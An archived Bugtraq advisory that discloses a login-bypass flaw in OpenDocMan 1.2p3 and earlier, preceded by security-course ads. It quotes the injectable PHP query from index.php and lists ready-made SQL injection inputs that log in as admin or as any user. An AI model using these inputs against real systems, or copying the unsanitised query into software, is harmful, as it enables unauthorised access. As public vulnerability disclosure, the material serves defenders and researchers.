Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

opendocman <= 1.2p3 Bypass admin/user Login

Subject: opendocman <= 1.2p3 Bypass admin/user Login
Date: 30 Oct 2006 04:55:27 -0000
########################################################################
# opendocman <= 1.2p3 Bypass admin/user Login
# affected to opendocman-1.2rc3
# Download Source : http://www.opendocman.com/?page_id=14
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
file;
index.php
########################################################################
bugs;
$query = "SELECT id, username, password FROM user WHERE username = '$frmuser' 
AND password = password('$frmpass')";
        $result = mysql_query("$query") or die ("Error in query: $query. " . 
mysql_error());
########################################################################
exploit/POC;
if magic_quotes_gpc = Off -- u can do this;

Login administrator
username : ' OR 1=1 /*
password : blank 

Login User
username : username' /*
password : blank
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]

<Prev in Thread] Current Thread [Next in Thread>
  • opendocman <= 1.2p3 Bypass admin/user Login, k1tk4t <=